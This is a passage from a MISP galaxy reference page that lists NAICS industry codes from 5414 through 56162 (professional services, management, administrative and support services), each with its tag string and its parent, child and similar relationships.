  • child-of: misp-galaxy:naics="5414" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54149" with estimative-language:likelihood-probability="likely"

5415

Computer Systems Design and Related Services

The tag is: misp-galaxy:naics="5415"

5415 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541519" with estimative-language:likelihood-probability="likely"

54151

Computer Systems Design and Related Services

The tag is: misp-galaxy:naics="54151"

54151 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541511

Custom Computer Programming Services

The tag is: misp-galaxy:naics="541511"

541511 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541512

Computer Systems Design Services

The tag is: misp-galaxy:naics="541512"

541512 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541513

Computer Facilities Management Services

The tag is: misp-galaxy:naics="541513"

541513 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

541519

Other Computer Related Services

The tag is: misp-galaxy:naics="541519"

541519 has relationships with:

  • child-of: misp-galaxy:naics="5415" with estimative-language:likelihood-probability="likely"

5416

Management, Scientific, and Technical Consulting Services

The tag is: misp-galaxy:naics="5416"

5416 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541618" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541620" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54169" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541690" with estimative-language:likelihood-probability="likely"

54161

Management Consulting Services

The tag is: misp-galaxy:naics="54161"

54161 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541611

Administrative Management and General Management Consulting Services

The tag is: misp-galaxy:naics="541611"

541611 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541612

Human Resources Consulting Services

The tag is: misp-galaxy:naics="541612"

541612 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541613

Marketing Consulting Services

The tag is: misp-galaxy:naics="541613"

541613 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541614

Process, Physical Distribution, and Logistics Consulting Services

The tag is: misp-galaxy:naics="541614"

541614 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

541618

Other Management Consulting Services

The tag is: misp-galaxy:naics="541618"

541618 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

54162

Environmental Consulting Services

The tag is: misp-galaxy:naics="54162"

54162 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541620" with estimative-language:likelihood-probability="likely"

541620

Environmental Consulting Services

The tag is: misp-galaxy:naics="541620"

541620 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54162" with estimative-language:likelihood-probability="likely"

54169

Other Scientific and Technical Consulting Services

The tag is: misp-galaxy:naics="54169"

54169 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541690" with estimative-language:likelihood-probability="likely"

541690

Other Scientific and Technical Consulting Services

The tag is: misp-galaxy:naics="541690"

541690 has relationships with:

  • child-of: misp-galaxy:naics="5416" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54169" with estimative-language:likelihood-probability="likely"

5417

Scientific Research and Development Services

The tag is: misp-galaxy:naics="5417"

5417 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541713" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541714" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541715" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54172" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541720" with estimative-language:likelihood-probability="likely"

54171

Research and Development in the Physical, Engineering, and Life Sciences

The tag is: misp-galaxy:naics="54171"

54171 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

541713

Research and Development in Nanotechnology

The tag is: misp-galaxy:naics="541713"

541713 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

541714

Research and Development in Biotechnology (except Nanobiotechnology)

The tag is: misp-galaxy:naics="541714"

541714 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

541715

Research and Development in the Physical, Engineering, and Life Sciences (except Nanotechnology and Biotechnology)

The tag is: misp-galaxy:naics="541715"

541715 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

54172

Research and Development in the Social Sciences and Humanities

The tag is: misp-galaxy:naics="54172"

54172 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541720" with estimative-language:likelihood-probability="likely"

541720

Research and Development in the Social Sciences and Humanities

The tag is: misp-galaxy:naics="541720"

541720 has relationships with:

  • child-of: misp-galaxy:naics="5417" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54172" with estimative-language:likelihood-probability="likely"

5418

Advertising, Public Relations, and Related Services

The tag is: misp-galaxy:naics="5418"

5418 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54181" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541810" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54182" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541820" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54183" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541830" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54184" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541840" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54185" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541850" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54186" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541860" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54187" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541870" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54189" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541890" with estimative-language:likelihood-probability="likely"

54181

Advertising Agencies

The tag is: misp-galaxy:naics="54181"

54181 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541810" with estimative-language:likelihood-probability="likely"

541810

Advertising Agencies

The tag is: misp-galaxy:naics="541810"

541810 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54181" with estimative-language:likelihood-probability="likely"

54182

Public Relations Agencies

The tag is: misp-galaxy:naics="54182"

54182 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541820" with estimative-language:likelihood-probability="likely"

541820

Public Relations Agencies

The tag is: misp-galaxy:naics="541820"

541820 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54182" with estimative-language:likelihood-probability="likely"

54183

Media Buying Agencies

The tag is: misp-galaxy:naics="54183"

54183 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541830" with estimative-language:likelihood-probability="likely"

541830

Media Buying Agencies

The tag is: misp-galaxy:naics="541830"

541830 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54183" with estimative-language:likelihood-probability="likely"

54184

Media Representatives

The tag is: misp-galaxy:naics="54184"

54184 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541840" with estimative-language:likelihood-probability="likely"

541840

Media Representatives

The tag is: misp-galaxy:naics="541840"

541840 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54184" with estimative-language:likelihood-probability="likely"

54185

Indoor and Outdoor Display Advertising

The tag is: misp-galaxy:naics="54185"

54185 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541850" with estimative-language:likelihood-probability="likely"

541850

Indoor and Outdoor Display Advertising

The tag is: misp-galaxy:naics="541850"

541850 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54185" with estimative-language:likelihood-probability="likely"

54186

Direct Mail Advertising

The tag is: misp-galaxy:naics="54186"

54186 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541860" with estimative-language:likelihood-probability="likely"

541860

Direct Mail Advertising

The tag is: misp-galaxy:naics="541860"

541860 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54186" with estimative-language:likelihood-probability="likely"

54187

Advertising Material Distribution Services

The tag is: misp-galaxy:naics="54187"

54187 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541870" with estimative-language:likelihood-probability="likely"

541870

Advertising Material Distribution Services

The tag is: misp-galaxy:naics="541870"

541870 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54187" with estimative-language:likelihood-probability="likely"

54189

Other Services Related to Advertising

The tag is: misp-galaxy:naics="54189"

54189 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541890" with estimative-language:likelihood-probability="likely"

541890

Other Services Related to Advertising

The tag is: misp-galaxy:naics="541890"

541890 has relationships with:

  • child-of: misp-galaxy:naics="5418" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54189" with estimative-language:likelihood-probability="likely"

5419

Other Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="5419"

5419 has relationships with:

  • child-of: misp-galaxy:naics="541" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54192" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541922" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54193" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54194" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="54199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="541990" with estimative-language:likelihood-probability="likely"

54191

Marketing Research and Public Opinion Polling

The tag is: misp-galaxy:naics="54191"

54191 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541910" with estimative-language:likelihood-probability="likely"

541910

Marketing Research and Public Opinion Polling

The tag is: misp-galaxy:naics="541910"

541910 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54191" with estimative-language:likelihood-probability="likely"

54192

Photographic Services

The tag is: misp-galaxy:naics="54192"

54192 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

541921

Photography Studios, Portrait

The tag is: misp-galaxy:naics="541921"

541921 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

541922

Commercial Photography

The tag is: misp-galaxy:naics="541922"

541922 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

54193

Translation and Interpretation Services

The tag is: misp-galaxy:naics="54193"

54193 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541930" with estimative-language:likelihood-probability="likely"

541930

Translation and Interpretation Services

The tag is: misp-galaxy:naics="541930"

541930 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54193" with estimative-language:likelihood-probability="likely"

54194

Veterinary Services

The tag is: misp-galaxy:naics="54194"

54194 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541940" with estimative-language:likelihood-probability="likely"

541940

Veterinary Services

The tag is: misp-galaxy:naics="541940"

541940 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54194" with estimative-language:likelihood-probability="likely"

54199

All Other Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="54199"

54199 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="541990" with estimative-language:likelihood-probability="likely"

541990

All Other Professional, Scientific, and Technical Services

The tag is: misp-galaxy:naics="541990"

541990 has relationships with:

  • child-of: misp-galaxy:naics="5419" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="54199" with estimative-language:likelihood-probability="likely"

55

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="55"

55 has relationships with:

  • parent-of: misp-galaxy:naics="551" with estimative-language:likelihood-probability="likely"

551

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="551"

551 has relationships with:

  • child-of: misp-galaxy:naics="55" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

5511

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="5511"

5511 has relationships with:

  • child-of: misp-galaxy:naics="551" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="55111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="551111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="551112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="551114" with estimative-language:likelihood-probability="likely"

55111

Management of Companies and Enterprises

The tag is: misp-galaxy:naics="55111"

55111 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

551111

Offices of Bank Holding Companies

The tag is: misp-galaxy:naics="551111"

551111 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

551112

Offices of Other Holding Companies

The tag is: misp-galaxy:naics="551112"

551112 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

551114

Corporate, Subsidiary, and Regional Managing Offices

The tag is: misp-galaxy:naics="551114"

551114 has relationships with:

  • child-of: misp-galaxy:naics="5511" with estimative-language:likelihood-probability="likely"

56

Administrative and Support and Waste Management and Remediation Services

The tag is: misp-galaxy:naics="56"

56 has relationships with:

  • parent-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

561

Administrative and Support Services

The tag is: misp-galaxy:naics="561"

561 has relationships with:

  • child-of: misp-galaxy:naics="56" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5617" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5619" with estimative-language:likelihood-probability="likely"

5611

Office Administrative Services

The tag is: misp-galaxy:naics="5611"

5611 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561110" with estimative-language:likelihood-probability="likely"

56111

Office Administrative Services

The tag is: misp-galaxy:naics="56111"

56111 has relationships with:

  • child-of: misp-galaxy:naics="5611" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561110" with estimative-language:likelihood-probability="likely"

561110

Office Administrative Services

The tag is: misp-galaxy:naics="561110"

561110 has relationships with:

  • child-of: misp-galaxy:naics="5611" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56111" with estimative-language:likelihood-probability="likely"

5612

Facilities Support Services

The tag is: misp-galaxy:naics="5612"

5612 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561210" with estimative-language:likelihood-probability="likely"

56121

Facilities Support Services

The tag is: misp-galaxy:naics="56121"

56121 has relationships with:

  • child-of: misp-galaxy:naics="5612" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561210" with estimative-language:likelihood-probability="likely"

561210

Facilities Support Services

The tag is: misp-galaxy:naics="561210"

561210 has relationships with:

  • child-of: misp-galaxy:naics="5612" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56121" with estimative-language:likelihood-probability="likely"

5613

Employment Services

The tag is: misp-galaxy:naics="5613"

5613 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561330" with estimative-language:likelihood-probability="likely"

56131

Employment Placement Agencies and Executive Search Services

The tag is: misp-galaxy:naics="56131"

56131 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

561311

Employment Placement Agencies

The tag is: misp-galaxy:naics="561311"

561311 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

561312

Executive Search Services

The tag is: misp-galaxy:naics="561312"

561312 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

56132

Temporary Help Services

The tag is: misp-galaxy:naics="56132"

56132 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561320" with estimative-language:likelihood-probability="likely"

561320

Temporary Help Services

The tag is: misp-galaxy:naics="561320"

561320 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56132" with estimative-language:likelihood-probability="likely"

56133

Professional Employer Organizations

The tag is: misp-galaxy:naics="56133"

56133 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561330" with estimative-language:likelihood-probability="likely"

561330

Professional Employer Organizations

The tag is: misp-galaxy:naics="561330"

561330 has relationships with:

  • child-of: misp-galaxy:naics="5613" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56133" with estimative-language:likelihood-probability="likely"

5614

Business Support Services

The tag is: misp-galaxy:naics="5614"

5614 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561421" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561422" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561431" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561439" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56144" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561440" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56145" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561450" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561499" with estimative-language:likelihood-probability="likely"

56141

Document Preparation Services

The tag is: misp-galaxy:naics="56141"

56141 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561410" with estimative-language:likelihood-probability="likely"

561410

Document Preparation Services

The tag is: misp-galaxy:naics="561410"

561410 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56141" with estimative-language:likelihood-probability="likely"

56142

Telephone Call Centers

The tag is: misp-galaxy:naics="56142"

56142 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561421

Telephone Answering Services

The tag is: misp-galaxy:naics="561421"

561421 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561422

Telemarketing Bureaus and Other Contact Centers

The tag is: misp-galaxy:naics="561422"

561422 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

56143

Business Service Centers

The tag is: misp-galaxy:naics="56143"

56143 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561431

Private Mail Centers

The tag is: misp-galaxy:naics="561431"

561431 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561439

Other Business Service Centers (including Copy Shops)

The tag is: misp-galaxy:naics="561439"

561439 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

56144

Collection Agencies

The tag is: misp-galaxy:naics="56144"

56144 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561440" with estimative-language:likelihood-probability="likely"

561440

Collection Agencies

The tag is: misp-galaxy:naics="561440"

561440 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56144" with estimative-language:likelihood-probability="likely"

56145

Credit Bureaus

The tag is: misp-galaxy:naics="56145"

56145 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561450" with estimative-language:likelihood-probability="likely"

561450

Credit Bureaus

The tag is: misp-galaxy:naics="561450"

561450 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56145" with estimative-language:likelihood-probability="likely"

56149

Other Business Support Services

The tag is: misp-galaxy:naics="56149"

56149 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561491

Repossession Services

The tag is: misp-galaxy:naics="561491"

561491 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561492

Court Reporting and Stenotype Services

The tag is: misp-galaxy:naics="561492"

561492 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

561499

All Other Business Support Services

The tag is: misp-galaxy:naics="561499"

561499 has relationships with:

  • child-of: misp-galaxy:naics="5614" with estimative-language:likelihood-probability="likely"

5615

Travel Arrangement and Reservation Services

The tag is: misp-galaxy:naics="5615"

5615 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561510" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56152" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561520" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56159" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561591" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561599" with estimative-language:likelihood-probability="likely"

56151

Travel Agencies

The tag is: misp-galaxy:naics="56151"

56151 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561510" with estimative-language:likelihood-probability="likely"

561510

Travel Agencies

The tag is: misp-galaxy:naics="561510"

561510 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56151" with estimative-language:likelihood-probability="likely"

56152

Tour Operators

The tag is: misp-galaxy:naics="56152"

56152 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="561520" with estimative-language:likelihood-probability="likely"

561520

Tour Operators

The tag is: misp-galaxy:naics="561520"

561520 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56152" with estimative-language:likelihood-probability="likely"

56159

Other Travel Arrangement and Reservation Services

The tag is: misp-galaxy:naics="56159"

56159 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

561591

Convention and Visitors Bureaus

The tag is: misp-galaxy:naics="561591"

561591 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

561599

All Other Travel Arrangement and Reservation Services

The tag is: misp-galaxy:naics="561599"

561599 has relationships with:

  • child-of: misp-galaxy:naics="5615" with estimative-language:likelihood-probability="likely"

5616

Investigation and Security Services

The tag is: misp-galaxy:naics="5616"

5616 has relationships with:

  • child-of: misp-galaxy:naics="561" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561613" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="561622" with estimative-language:likelihood-probability="likely"

56161

Investigation, Guard, and Armored Car Services

The tag is: misp-galaxy:naics="56161"

56161 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561611

Investigation and Personal Background Check Services

The tag is: misp-galaxy:naics="561611"

561611 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561612

Security Guards and Patrol Services

The tag is: misp-galaxy:naics="561612"

561612 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

561613

Armored Car Services

The tag is: misp-galaxy:naics="561613"

561613 has relationships with:

  • child-of: misp-galaxy:naics="5616" with estimative-language:likelihood-probability="likely"

56162

Security Systems Services

